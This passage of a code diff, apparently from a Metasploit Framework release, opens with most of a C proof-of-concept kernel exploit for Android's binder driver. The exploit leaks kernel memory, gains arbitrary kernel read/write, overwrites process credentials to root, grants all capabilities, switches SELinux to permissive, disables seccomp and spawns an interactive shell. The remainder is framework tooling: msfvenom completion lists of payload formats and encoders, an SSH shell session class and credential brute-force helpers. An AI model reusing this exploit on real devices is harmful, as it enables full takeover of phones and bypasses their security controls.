+    if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
+    close(pipefd[1]);
+    printf("CHILD: Finished write to FIFO.\n");
+
+    exit(0);
+  }
+  //printf("PARENT: Calling READV\n");
+  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
+  b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
+  printf("writev() returns 0x%x\n", (unsigned int)b);
+  // second page: leaked data
+  if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
+  //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));
+
+  printf("PARENT: Finished calling READV\n");
+  int status;
+  if (wait(&status) != fork_ret) err(1, "wait");
+
+  current_ptr = *(unsigned long *)(page_buffer + 0xe8);
+  printf("current_ptr == 0x%lx\n", current_ptr);
+}
+
+void clobber_addr_limit(void)
+{
+  struct epoll_event event = { .events = EPOLLIN };
+  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");
+
+  struct iovec iovec_array[IOVEC_ARRAY_SZ];
+  memset(iovec_array, 0, sizeof(iovec_array));
+
+  unsigned long second_write_chunk[] = {
+    1, /* iov_len */
+    0xdeadbeef, /* iov_base (already used) */
+    0x8 + 2 * 0x10, /* iov_len (already used) */
+    current_ptr + 0x8, /* next iov_base (addr_limit) */
+    8, /* next iov_len (sizeof(addr_limit)) */
+    0xfffffffffffffffe /* value to write */
+  };
+
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
+  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
+  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
+  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
+  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */
+
+  int socks[2];
+  if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
+  if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");
+
+  pid_t fork_ret = fork();
+  if (fork_ret == -1) err(1, "fork");
+  if (fork_ret == 0){
+    /* Child process */
+    prctl(PR_SET_PDEATHSIG, SIGKILL);
+    sleep(2);
+    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
+    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
+    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
+    if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
+      err(1, "write second chunk to socket");
+    exit(0);
+  }
+  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
+  struct msghdr msg = {
+    .msg_iov = iovec_array,
+    .msg_iovlen = IOVEC_ARRAY_SZ
+  };
+  int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);
+  printf("recvmsg() returns %d, expected %lu\n", recvmsg_result,
+      (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len +
+      iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len +
+      iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len));
+}
+
+int kernel_rw_pipe[2];
+void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {
+  errno = 0;
+  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
+  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");
+  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");
+}
+void kernel_read(unsigned long kaddr, void *buf, unsigned long len) {
+  errno = 0;
+  if (len > 0x1000) errx(1, "kernel reads over PAGE_SIZE are messy, tried 0x%lx", len);
+  if (write(kernel_rw_pipe[1], (void*)kaddr, len) != len) err(1, "kernel_read failed to read kernel memory");
+  if (read(kernel_rw_pipe[0], buf, len) != len) err(1, "kernel_read failed to write out to userspace");
+}
+unsigned long kernel_read_ulong(unsigned long kaddr) {
+  unsigned long data;
+  kernel_read(kaddr, &data, sizeof(data));
+  return data;
+}
+unsigned long kernel_read_uint(unsigned long kaddr) {
+  unsigned int data;
+  kernel_read(kaddr, &data, sizeof(data));
+  return data;
+}
+void kernel_write_ulong(unsigned long kaddr, unsigned long data) {
+  kernel_write(kaddr, &data, sizeof(data));
+}
+void kernel_write_uint(unsigned long kaddr, unsigned int data) {
+  kernel_write(kaddr, &data, sizeof(data));
+}
+
+// Linux localhost 4.4.177-g83bee1dc48e8 #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019 aarch64
+// data from `pahole` on my own build with the same .config
+#define OFFSET__task_struct__mm 0x520
+#define OFFSET__task_struct__cred 0x790
+#define OFFSET__mm_struct__user_ns 0x300
+#define OFFSET__uts_namespace__name__version 0xc7
+// SYMBOL_* are relative to _head; data from /proc/kallsyms on userdebug
+#define SYMBOL__init_user_ns 0x202f2c8
+#define SYMBOL__init_task 0x20257d0
+#define SYMBOL__init_uts_ns 0x20255c0
+
+#define OFFSET__task_struct__thread_info__flags 0
+#define SYMBOL__selinux_enforcing 0x23ce4a8 // Grant: recovered using droidimg+miasm
+
+int main(void) {
+  printf("Starting POC\n");
+  //pin_to(0);
+
+  dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+  if (dummy_page_4g_aligned != (void*)0x100000000UL)
+    err(1, "mmap 4g aligned");
+  if (pipe(kernel_rw_pipe)) err(1, "kernel_rw_pipe");
+
+  binder_fd = open("/dev/binder", O_RDONLY);
+  epfd = epoll_create(1000);
+  leak_task_struct();
+  clobber_addr_limit();
+
+  setbuf(stdout, NULL);
+  printf("should have stable kernel R/W now\n");
+
+  /*size_t readsize = 0x1000;*/
+  /*void* readbuf = malloc(readsize);*/
+  /*kernel_read(current_ptr, readbuf, readsize);*/
+  /*hexdump_memory(readbuf, readsize);*/
+
+  /*in case you want to do stuff with the creds, to show that you can get them:*/
+  unsigned long current_mm = kernel_read_ulong(current_ptr + OFFSET__task_struct__mm);
+  printf("current->mm == 0x%lx\n", current_mm);
+  unsigned long current_user_ns = kernel_read_ulong(current_mm + OFFSET__mm_struct__user_ns);
+  printf("current->mm->user_ns == 0x%lx\n", current_user_ns);
+  unsigned long kernel_base = current_user_ns - SYMBOL__init_user_ns;
+  printf("kernel base is 0x%lx\n", kernel_base);
+  if (kernel_base & 0xfffUL) errx(1, "bad kernel base (not 0x...000)");
+  unsigned long init_task = kernel_base + SYMBOL__init_task;
+  printf("&init_task == 0x%lx\n", init_task);
+  unsigned long init_task_cred = kernel_read_ulong(init_task + OFFSET__task_struct__cred);
+  printf("init_task.cred == 0x%lx\n", init_task_cred);
+  unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);
+  printf("current->cred == 0x%lx\n", my_cred);
+
+  unsigned long my_uid = my_cred + 4;
+  unsigned long my_suid = my_uid + 8;
+  unsigned long my_euid = my_uid + 16;
+  unsigned long my_fsuid = my_uid + 24;
+  unsigned long uid = kernel_read_ulong(my_uid);
+  printf("uid == 0x%lx\n", uid);
+  kernel_write_ulong(my_uid, 0);
+  unsigned long suid = kernel_read_ulong(my_suid);
+  printf("suid == 0x%lx\n", suid);
+  kernel_write_ulong(my_suid, 0);
+  unsigned long euid = kernel_read_ulong(my_euid);
+  printf("euid == 0x%lx\n", euid);
+  kernel_write_ulong(my_euid, 0);
+  unsigned long fsuid = kernel_read_ulong(my_fsuid);
+  printf("fsuid == 0x%lx\n", fsuid);
+  kernel_write_ulong(my_fsuid, 0);
+
+  if (getuid() != 0) {
+    printf("Something went wrong changing our UID to root!\n");
+    exit(1);
+  }
+
+
+  // reset securebits
+  kernel_write_uint(my_cred+0x24, 0);
+
+  // change capabilities to everything (perm, effective, bounding)
+  for (int i = 0; i < 3; i++)
+    kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL);
+
+  printf("Capabilities set to ALL\n");
+
+#if 0
+  // Grant: this was a failed attempt of just changing my SELinux SID to init's (sid = 7)
+  // It was "working", but my process's pty would hang, so I couldnt interact with a shell
+  // From here I just disabled SELinux
+
+  // change SID to init
+  for (int i = 0; i < 2; i++)
+    kernel_write_uint(current_cred_security + i*4, 1);
+  printf("[+] before 2\n");
+  kernel_write_uint(current_cred_security + 0, 1);
+  printf("[+] before 3\n");
+  kernel_write_uint(current_cred_security + 8, 7);
+
+  kernel_write_ulong(current_cred_security, 0x0100000001UL);
+
+  kernel_write_uint(current_cred_security + 8, 7);
+  printf("[+] SID -> init (7)\n");
+#endif
+
+  // Grant: was checking for this earlier, but it's not set, so I moved on
+  // printf("PR_GET_NO_NEW_PRIVS %d\n", prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0));
+
+  unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing);
+
+  printf("SELinux status = %u\n", enforcing);
+
+  if (enforcing) {
+    printf("Setting SELinux to permissive\n");
+    kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0);
+  } else {
+    printf("SELinux is already in permissive mode\n");
+  }
+
+  // Grant: We want to be as powerful as init, which includes mounting in the global namespace
+  printf("Re-joining the init mount namespace...\n");
+  int fd = open("/proc/1/ns/mnt", O_RDONLY);
+
+  if (fd < 0) {
+    perror("open");
+    exit(1);
+  }
+
+  if (setns(fd, CLONE_NEWNS) < 0) {
+    perror("setns");
+    exit(1);
+  }
+
+  printf("Re-joining the init net namespace...\n");
+
+  fd = open("/proc/1/ns/net", O_RDONLY);
+
+  if (fd < 0) {
+    perror("open");
+    exit(1);
+  }
+
+  if (setns(fd, CLONE_NEWNET) < 0) {
+    perror("setns");
+    exit(1);
+  }
+
+  // Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts
+  if (prctl(PR_GET_SECCOMP) != 0) {
+    printf("Disabling SECCOMP\n");
+
+    // Grant: we need to clear TIF_SECCOMP from task first, otherwise, kernel WARN
+    // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag)
+    // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11
+    kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0);
+    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0);
+    kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0);
+
+    if (prctl(PR_GET_SECCOMP) != 0) {
+      printf("Failed to disable SECCOMP!\n");
+      exit(1);
+    } else {
+      printf("SECCOMP disabled!\n");
+    }
+  } else {
+    printf("SECCOMP is already disabled!\n");
+  }
+
+  /*kernel_read(my_cred, readbuf, readsize);*/
+  /*hexdump_memory(readbuf, readsize);*/
+
+  system("/system/bin/sh -i");
+
+  /*unsigned long init_uts_ns = kernel_base + SYMBOL__init_uts_ns;*/
+  /*char new_uts_version[] = "EXPLOITED KERNEL";*/
+  /*kernel_write(init_uts_ns + OFFSET__uts_namespace__name__version, new_uts_version, sizeof(new_uts_version));*/
+}

external/zsh/_msfconsole

@@ -21,18 +21,20 @@
 # ------------------------------------------------------------------------------
 
 _arguments \
+  "--defer-module-loads[Defer module loading unless explicitly asked]" \
   {-a,--ask}"[Ask before exiting Metasploit or accept 'exit -y']" \
   "-c[Load the specified configuration file]:configuration file:_files" \
-  {-E,--environment}"[Specify the database environment to load from the configuration]:environment:(production development)" \
+  {-E,--environment}"[Set Rails environment, defaults to RAIL_ENV environment variable or 'production']:environment:(production development)" \
+  {-H,--history-file}"[Save command history to the specified file]:history file:_files" \
   {-h,--help}"[Show help text]" \
   {-L,--real-readline}"[Use the system Readline library instead of RbReadline]" \
   {-M,--migration-path}"[Specify a directory containing additional DB migrations]:directory:_files -/" \
-  {-m,--module-path}"[Specifies an additional module search path]:search path:_files -/" \
+  {-m,--module-path}"[Load an additional module path]:module path:_files -/" \
   {-n,--no-database}"[Disable database support]" \
   {-o,--output}"[Output to the specified file]:output file" \
   {-p,--plugin}"[Load a plugin on startup]:plugin file:_files" \
   {-q,--quiet}"[Do not print the banner on startup]" \
   {-r,--resource}"[Execute the specified resource file (- for stdin)]:resource file:_files" \
   {-v,--version}"[Show version]" \
-  {-x,--execute-command}"[Execute the specified string as console commands]:commands" \
+  {-x,--execute-command}"[Execute the specified console commands (use ; for multiples)]:commands" \
   {-y,--yaml}"[Specify a YAML file containing database settings]:yaml file:_files"

external/zsh/_msfvenom

@@ -20,9 +20,49 @@
 #
 # ------------------------------------------------------------------------------
 
+_msfvenom_archs_list=(
+  'aarch64'
+  'armbe'
+  'armle'
+  'cbea'
+  'cbea64'
+  'cmd'
+  'dalvik'
+  'firefox'
+  'java'
+  'mips'
+  'mips64'
+  'mips64le'
+  'mipsbe'
+  'mipsle'
+  'nodejs'
+  'php'
+  'ppc'
+  'ppc64'
+  'ppc64le'
+  'ppce500v2'
+  'python'
+  'r'
+  'ruby'
+  'sparc'
+  'sparc64'
+  'tty'
+  'x64'
+  'x86'
+  'x86_64'
+  'zarch'
+)
+
+_msfvenom_arch() {
+  _describe -t archs 'available archs' _msfvenom_archs_list || compadd "$@"
+}
+
 _msfvenom_encoders_list=(
+  'cmd/brace'
+  'cmd/echo'
   'cmd/generic_sh'
   'cmd/ifs'
+  'cmd/perl'
   'cmd/powershell_base64'
   'cmd/printf_php_mq'
   'generic/eicar'
@@ -34,14 +74,19 @@ _msfvenom_encoders_list=(
   'php/base64'
   'ppc/longxor'
   'ppc/longxor_tag'
+  'ruby/base64'
   'sparc/longxor_tag'
   'x64/xor'
+  'x64/xor_context'
+  'x64/xor_dynamic'
+  'x64/zutto_dekiru'
   'x86/add_sub'
   'x86/alpha_mixed'
   'x86/alpha_upper'
   'x86/avoid_underscore_tolower'
   'x86/avoid_utf8_tolower'
   'x86/bloxor'
+  'x86/bmp_polyglot'
   'x86/call4_dword_xor'
   'x86/context_cpuid'
   'x86/context_stat'
@@ -52,30 +97,139 @@ _msfvenom_encoders_list=(
   'x86/nonalpha'
   'x86/nonupper'
   'x86/opt_sub'
+  'x86/service'
   'x86/shikata_ga_nai'
   'x86/single_static_bit'
   'x86/unicode_mixed'
   'x86/unicode_upper'
+  'x86/xor_dynamic'
 )
 
 _msfvenom_encoder() {
   _describe -t encoders 'available encoders' _msfvenom_encoders_list || compadd "$@"
 }
 
+_msfvenom_formats_list=(
+  # Executable formats
+  'asp'
+  'aspx'
+  'aspx-exe'
+  'axis2'
+  'dll'
+  'elf'
+  'elf-so'
+  'exe'
+  'exe-only'
+  'exe-service'
+  'exe-small'
+  'hta-psh'
+  'jar'
+  'jsp'
+  'loop-vbs'
+  'macho'
+  'msi'
+  'msi-nouac'
+  'osx-app'
+  'psh'
+  'psh-cmd'
+  'psh-net'
+  'psh-reflection'
+  'vba'
+  'vba-exe'
+  'vba-psh'
+  'vbs'
+  'war'
+  # Transform formats
+  'bash'
+  'c'
+  'csharp'
+  'dw'
+  'dword'
+  'hex'
+  'java'
+  'js_be'
+  'js_le'
+  'num'
+  'perl'
+  'pl'
+  'powershell'
+  'ps1'
+  'py'
+  'python'
+  'raw'
+  'rb'
+  'ruby'
+  'sh'
+  'vbapplication'
+  'vbscript'
+)
+
+_msfvenom_format() {
+  _describe -t formats 'available formats' _msfvenom_formats_list || compadd "$@"
+}
+
+_msfvenom_platforms_list=(
+  'aix'
+  'android'
+  'apple_ios'
+  'brocade'
+  'bsd'
+  'bsdi'
+  'cisco'
+  'firefox'
+  'freebsd'
+  'hardware'
+  'hpux'
+  'irix'
+  'java'
+  'javascript'
+  'juniper'
+  'linux'
+  'mainframe'
+  'multi'
+  'netbsd'
+  'netware'
+  'nodejs'
+  'openbsd'
+  'osx'
+  'php'
+  'python'
+  'r'
+  'ruby'
+  'solaris'
+  'unifi'
+  'unix'
+  'unknown'
+  'windows'
+)
+
+_msfvenom_platform() {
+  _describe -t platforms 'available platforms' _msfvenom_platforms_list || compadd "$@"
+}
+
 _arguments \
-  {-a,--arch}"[The architecture to encode as]:architecture:(cmd generic mipsbe mipsle php ppc sparc x64 x86)" \
-  {-b,--bad-chars}"[The list of characters to avoid, example: '\x00\xff']:bad characters" \
+  "--smallest[Generate the smallest possible payload using all available encoders]" \
+  "--sec-name[The new section name to use when generating large Windows binaries. Default: random 4-character alpha string]" \
+  "--encoder-space[The maximum size of the encoded payload (defaults to the -s value)]:length" \
+  "--encrypt[The type of encryption or encoding to apply to the shellcode]:value" \
+  "--encrypt-key[A key to be used for --encrypt]:value" \
+  "--encrypt-iv[An initialization vector for --encrypt]:value" \
+  "--list-options[List --payload <value>'s standard, advanced and evasion options]" \
+  "--pad-nops[Use nopsled size specified by -n \<length\> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)]" \
+  "--platform[The platform for --payload (use --list platforms to list)]:target platform:_msfvenom_platform" \
+  {-a,--arch}"[The architecture to use for --payload and --encoders (use --list archs to list)]:architecture:_msfvenom_archs" \
+  {-b,--bad-chars}"[Characters to avoid example: '\x00\xff']:bad characters" \
   {-c,--add-code}"[Specify an additional win32 shellcode file to include]:shellcode file:_files" \
-  {-e,--encoder}"[The encoder to use]:encoder:_msfvenom_encoder" \
-  {-f,--format}"[Output format]:output format:(bash c csharp dw dword java js_be js_le num perl pl powershell ps1 py python raw rb ruby sh vbapplication vbscript asp aspx aspx-exe dll elf exe exe-only exe-service exe-small loop-vbs macho msi msi-nouac osx-app psh psh-net psh-reflection vba vba-exe vbs war)" \
-  "--help-formats[List available formats]" \
-  {-h,--help}"[Help banner]" \
+  {-e,--encoder}"[The encoder to use (use --list encoders to list)]:encoder:_msfvenom_encoder" \
+  {-f,--format}"[Output format (use --list formats to list)]:output format:_msfvenom_formats" \
+  {-h,--help}"[Show the help banner]" \
   {-i,--iterations}"[The number of times to encode the payload]:iterations" \
-  {-k,--keep}"[Preserve the template behavior and inject the payload as a new thread]" \
-  {-l,--list}"[List a module type]:module type:(all encoders nops payloads)" \
-  {-n,--nopsled}"[Prepend a nopsled of length size on to the payload]:nopsled length" \
-  {-o,--options}"[List the payload's standard options]" \
-  "--platform[The platform to encode for]:target platform:(android bsd bsdi java linux netware nodejs osx php python ruby solaris unix win)" \
-  {-p,--payload}"[Payload to use. Specify a '-' or stdin to use custom payloads]:payload" \
+  {-k,--keep}"[Preserve the --template behavior and inject the payload as a new thread]" \
+  {-l,--list}"[List all modules for \[type\]]:module type:(payloads encoders nops platforms archs encrypt formats all)" \
+  {-n,--nopsled}"[Prepend a nopsled of \[length\] size on to the payload]:nopsled length" \
+  {-o,--out}"[Save the payload to a file]:output file:_files" \
+  {-p,--payload}"[Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom]:payload" \
   {-s,--space}"[The maximum size of the resulting payload]:length" \
-  {-x,--template}"[Specify an alternate executable template]:template file:_files"
+  {-t,--timeout}"[The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)]:second" \
+  {-v,--var-name}"[Specify a custom variable name to use for certain output formats]:value" \
+  {-x,--template}"[Specify a custom executable file to use as a template]:template file:_files"

lib/expect.rb

@@ -0,0 +1,74 @@
+# Sourced from Ruby's ext/pty/lib/expect.rb to allow for access from Windows,
+# which does not seem to have an issue using this particular method with
+# sockets (pipes and other handles won't work, so don't use it for that).
+# frozen_string_literal: true
+$expect_verbose = false
+
+# Expect library adds the IO instance method #expect, which does similar act to
+# tcl's expect extension.
+#
+# In order to use this method, you must require expect:
+#
+#   require 'expect'
+#
+# Please see #expect for usage.
+class IO
+  # call-seq:
+  #   IO#expect(pattern,timeout=9999999)                  ->  Array
+  #   IO#expect(pattern,timeout=9999999) { |result| ... } ->  nil
+  #
+  # Reads from the IO until the given +pattern+ matches or the +timeout+ is over.
+  #
+  # It returns an array with the read buffer, followed by the matches.
+  # If a block is given, the result is yielded to the block and returns nil.
+  #
+  # When called without a block, it waits until the input that matches the
+  # given +pattern+ is obtained from the IO or the time specified as the
+  # timeout passes. An array is returned when the pattern is obtained from the
+  # IO. The first element of the array is the entire string obtained from the
+  # IO until the pattern matches, followed by elements indicating which the
+  # pattern which matched to the anchor in the regular expression.
+  #
+  # The optional timeout parameter defines, in seconds, the total time to wait
+  # for the pattern.  If the timeout expires or eof is found, nil is returned
+  # or yielded.  However, the buffer in a timeout session is kept for the next
+  # expect call.  The default timeout is 9999999 seconds.
+  def expect(pat,timeout=9999999)
+    buf = ''.dup
+    case pat
+    when String
+      e_pat = Regexp.new(Regexp.quote(pat))
+    when Regexp
+      e_pat = pat
+    else
+      raise TypeError, "unsupported pattern class: #{pat.class}"
+    end
+    @unusedBuf ||= ''
+    while true
+      if not @unusedBuf.empty?
+        c = @unusedBuf.slice!(0)
+      elsif !IO.select([self],nil,nil,timeout) or eof? then
+        result = nil
+        @unusedBuf = buf
+        break
+      else
+        c = getc
+      end
+      buf << c
+      if $expect_verbose
+        STDOUT.print c
+        STDOUT.flush
+      end
+      if mat=e_pat.match(buf) then
+        result = [buf,*mat.captures]
+        break
+      end
+    end
+    if block_given? then
+      yield result
+    else
+      return result
+    end
+    nil
+  end
+end

lib/metasploit/framework/data_service/proxy/loot_data_proxy.rb

@@ -4,7 +4,7 @@ module LootDataProxy
     begin
       self.data_service_operation do |data_service|
         if !data_service.is_a?(Msf::DBManager)
-          opts[:data] = Base64.urlsafe_encode64(opts[:data]) if opts[:data]
+          opts[:data] = Base64.urlsafe_encode64(opts[:data].empty? ? "" : opts[:data].join('')) if opts[:data] and opts[:data].kind_of?(Array) else opts[:data]
         end
         add_opts_workspace(opts)
         data_service.report_loot(opts)
@@ -58,4 +58,4 @@ module LootDataProxy
       self.log_error(e, "Problem updating loot")
     end
   end
-end
+end

lib/metasploit/framework/parsed_options/base.rb

@@ -163,7 +163,7 @@ class Metasploit::Framework::ParsedOptions::Base
 
       option_parser.on(
           '--defer-module-loads',
-          'Defer module loading unless explicitly asked.'
+          'Defer module loading unless explicitly asked'
       ) do
         options.modules.defer_loads = true
       end

lib/metasploit/framework/version.rb

@@ -30,7 +30,7 @@ module Metasploit
         end
       end
 
-      VERSION = "5.0.73"
+      VERSION = "5.0.78"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

lib/msf/base/sessions/ssh_command_shell.rb

@@ -0,0 +1,76 @@
+# -*- coding: binary -*-
+
+require 'msf/base/sessions/command_shell'
+
+module Msf::Sessions
+
+###
+#
+# This class provides basic interaction with a ChannelFD
+# abstraction provided by the Rex::Proto::Ssh wrapper
+# around HrrRbSsh.
+#
+#  Date:    June 22, 2019
+#  Author:  RageLtMan
+#
+###
+class SshCommandShell < Msf::Sessions::CommandShell
+
+  #
+  # This interface supports basic interaction.
+  #
+  include Msf::Session::Basic
+
+  #
+  # This interface supports interacting with a single command shell.
+  #
+  include Msf::Session::Provider::SingleCommandShell
+
+  ##
+  #
+  # Returns the session description.
+  #
+  def desc
+    "SSH command shell"
+  end
+
+  def shell_command(cmd)
+    # Send the command to the session's stdin.
+    shell_write(cmd + "\n")
+
+    timeo = 0.5
+    etime = ::Time.now.to_f + timeo
+    buff = ""
+
+    # Keep reading data until no more data is available or the timeout is
+    # reached.
+    while (::Time.now.to_f < etime and ::IO.select([rstream.fd_rd], nil, nil, timeo))
+      res = shell_read(-1, 0.01)
+      buff << res if res
+      timeo = etime - ::Time.now.to_f
+    end
+
+    buff
+  end
+
+protected
+
+  def _interact_stream
+    fdr = [rstream.fd_rd, user_input.fd]
+    fdw = [rstream.fd_wr, user_input.fd]
+    while self.interacting
+      sd = Rex::ThreadSafe.select(fdr, nil, fdw, 0.5)
+      next unless sd
+
+      if sd[0].include? rstream.fd_rd
+        user_output.print(shell_read)
+      end
+      if sd[0].include? user_input.fd
+        run_single((user_input.gets || '').chomp("\n"))
+      end
+      Thread.pass
+    end
+  end
+
+end
+end

lib/msf/base/simple/auxiliary.rb

@@ -173,7 +173,7 @@ protected
         mod.framework.ready.delete run_uuid
         result = block.call(mod)
         mod.framework.results[run_uuid] = {result: result}
-      rescue Exception => e
+      rescue ::Exception => e
         mod.framework.results[run_uuid] = {error: e.to_s}
         raise
       ensure

lib/msf/base/simple/payload.rb

@@ -105,8 +105,8 @@ module Payload
             fmt) +
           output
 
-        # If it's multistage, include the second stage too
-        if payload.staged?
+        # If verbose was requested and it's multistage, include the second stage too
+        if opts['Verbose'] && payload.staged?
           stage = payload.generate_stage
 
           # If a stage was generated, then display it

lib/msf/core/auxiliary/auth_brute.rb

@@ -82,6 +82,17 @@ module Auxiliary::AuthBrute
     end
   end
 
+  # Yields each Metasploit::Credential::Core in the Mdm::Workspace with
+  # a private type of 'nil'
+  #
+  # @yieldparam [Metasploit::Credential::Core]
+  def each_username_cred
+    creds = framework.db.creds(type: nil, workspace: myworkspace.name)
+    creds.each do |cred|
+      yield cred
+    end
+  end
+
   # Checks whether we should be adding creds from the DB to a CredCollection
   #
   # @return [TrueClass] if any of the datastore options for db creds are selected and the db is active
@@ -135,6 +146,21 @@ module Auxiliary::AuthBrute
     cred_collection
   end
 
+  # This method takes a Metasploit::Framework::CredentialCollection and prepends existing Usernames
+  # from the database. This allows the users to use the DB_ALL_USERS option.
+  #
+  # @param cred_collection [Metasploit::Framework::CredentialCollection]
+  #    the credential collection to add to
+  # @return [Metasploit::Framework::CredentialCollection] the modified Credentialcollection
+  def prepend_db_usernames(cred_collection)
+    if prepend_db_creds?
+      each_username_cred do |cred|
+        process_cred_for_collection(cred_collection,cred)
+      end
+    end
+    cred_collection
+  end
+
   # Takes a Metasploit::Credential::Core and converts it into a
   # Metasploit::Framework::Credential and processes it into the
   # Metasploit::Framework::CredentialCollection as dictated by the

lib/msf/core/auxiliary/scanner.rb

@@ -34,7 +34,6 @@ end
 
 def check
   nmod = replicant
-  nmod.datastore['RHOST'] = @original_rhost
   begin
     nmod.check_host(datastore['RHOST'])
   rescue NoMethodError

lib/msf/core/exploit/auto_check.rb

@@ -0,0 +1,45 @@
+# -*- coding: binary -*-
+
+#
+# XXX: This is a VERY ROUGH mixin for automatic check (formerly ForceExploit)
+#
+
+module Msf
+module Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super
+
+    register_advanced_options([
+      OptBool.new('AutoCheck', [false, 'Run check before exploitation', true])
+    ])
+  end
+
+  def exploit
+    unless datastore['AutoCheck']
+      print_warning('AutoCheck is disabled. Proceeding with exploitation.')
+      return
+    end
+
+    print_status('Executing automatic check (disable AutoCheck to override)')
+
+    # This isn't even my final form!
+    case (checkcode = check)
+    when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears
+      print_good(checkcode.message)
+    when Exploit::CheckCode::Detected
+      print_warning(checkcode.message)
+    when Exploit::CheckCode::Safe
+      fail_with(Module::Failure::NotVulnerable,
+                "#{checkcode.message}. Disable AutoCheck to override.")
+    when Exploit::CheckCode::Unsupported
+      fail_with(Module::Failure::BadConfig,
+                "#{checkcode.message}. Disable AutoCheck to override.")
+    else
+      fail_with(Module::Failure::Unknown,
+                "#{checkcode.message}. Disable AutoCheck to override.")
+    end
+  end
+
+end
+end

lib/msf/core/exploit/check_module.rb

@@ -24,17 +24,23 @@ module Exploit::Remote::CheckModule
 
     # Bail if we couldn't
     unless mod
-      return CheckCode::Unsupported("Could not instantiate #{check_module}")
+      return CheckCode::Unsupported(
+        "Could not instantiate #{check_module}"
+      )
     end
 
     # Bail if it isn't aux
     if mod.type != Msf::MODULE_AUX
-      return CheckCode::Unsupported("#{check_module} is not an auxiliary module")
+      return CheckCode::Unsupported(
+        "#{check_module} is not an auxiliary module"
+      )
     end
 
     # Bail if run isn't defined
     unless mod.respond_to?(:run)
-      return CheckCode::Unsupported("#{check_module} does not define a run method")
+      return CheckCode::Unsupported(
+        "#{check_module} does not define a run method"
+      )
     end
 
     print_status("Using #{check_module} as check")
@@ -57,14 +63,18 @@ module Exploit::Remote::CheckModule
 
       # Bail if module doesn't return a CheckCode
       unless checkcode.kind_of?(Exploit::CheckCode)
-        return Exploit::CheckCode::Unsupported("#{check_module} does not return a CheckCode")
+        return Exploit::CheckCode::Unsupported(
+          "#{check_module} does not return a CheckCode"
+        )
       end
 
       # Return the CheckCode
       checkcode
     else
       # Bail if module doesn't return a CheckCode
-      Exploit::CheckCode::Unsupported("#{check_module} does not return a CheckCode")
+      Exploit::CheckCode::Unsupported(
+        "#{check_module} does not return a CheckCode"
+      )
     end
   end
 

lib/msf/core/exploit/exe.rb

@@ -40,7 +40,7 @@ module Exploit::EXE
 
   def get_custom_exe(path = nil)
     path ||= datastore['EXE::Custom']
-    print_status("Using custom payload #{path}, RHOST and RPORT settings will be ignored!")
+    print_status("Using custom payload #{path}, no handler will be created!")
     datastore['DisablePayloadHandler'] = true
     exe = nil
     ::File.open(path,'rb') {|f| exe = f.read(f.stat.size)}

lib/msf/core/exploit/expect.rb

@@ -0,0 +1,41 @@
+# -*- coding: binary -*-
+
+#
+# XXX: This is a VERY ROUGH mixin for Expect-style interaction
+#
+
+require 'expect'
+
+module Msf::Exploit::Expect
+
+  # Send a line and expect a pattern
+  #
+  # @param line [String] Line to send
+  # @param pattern [Regexp] Pattern to expect
+  # @param sock [Socket] Socket to send/expect on
+  # @param newline [String] Newline character(s)
+  # @param timeout [Float] Seconds to expect pattern
+  # @return [void]
+  def send_expect(line, pattern, sock:, newline: "\n", timeout: 3.5)
